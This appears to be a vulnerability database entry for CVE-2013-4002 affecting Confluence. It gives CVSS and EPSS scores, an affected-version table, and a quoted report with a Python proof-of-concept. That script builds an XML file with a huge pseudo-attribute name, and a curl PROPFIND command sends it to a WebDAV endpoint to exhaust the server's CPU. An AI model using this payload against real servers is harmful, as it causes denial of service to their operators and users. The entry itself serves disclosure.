7.1 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:N/I:N/A:C
0.019 Low
EPSS
Percentile
87.0%
{quote}
There is WebDav endpoint that is accessible via following URL -
https://pwnie.ninja/confluence/plugins/servlet/confluence/default . It is possible to pass XML as data for
PROPFIND request.
Following python code will generate XML with long pseudo-attribute name that exploits CVE-2013-4002
issue.
{code}
#!/usr/bin/env python
import os
outdir = raw_input('specify output directory > ')
xml = "<?xml " + “\xe7\x9a\x84”*1000000 + “=‘china’ version = ‘1.0’?><a />”
with open(os.path.join(outdir,‘cve2013-4002.xml’),‘w’) as out:
out.write(xml)
def sizeof(num, suffix=‘B’):
for unit in [‘’,‘Ki’,‘Mi’,‘Gi’,‘Ti’,‘Pi’,‘Ei’,‘Zi’]:
if abs(num) < 1024.0:
return “%3.1f%s%s” % (num, unit, suffix)
num /= 1024.0
return “%.1f%s%s” % (num, ‘Yi’, suffix)
print “[+] File ‘cve2013-4002.xml’:”, sizeof(len(xml))
{code}
According to XML specification there are only three valid pseudo-attributes: version, encoding and
standalone. When we submit any random pseudo-attribute with long name, secure version of Xerces-J
parser just ignores it. At the same time vulnerable version will try to parse it. This will require much CPU
work.
If you try to send this request with curl, you will see that there is no immediate answer from server. You
will get “Gateway Time-out” answer from the server after 4 minutes.
{code}
curl -X ‘PROPFIND’ -H ‘Depth: 0’ -H ‘Content-Type: application/xml’
-H ‘Authorization: Basic Z3IzM2t3YXJpb3I6c2ExODEyODM5MSE=’ --databinary
‘@/tmp/cve2013-4002.xml’
https://pwnie.ninja/confluence/plugins/servlet/confluence/default
{code}
{quote}
CPE | Name | Operator | Version |
---|---|---|---|
confluence | le | 5.7.4 | |
confluence | lt | 5.8.9 |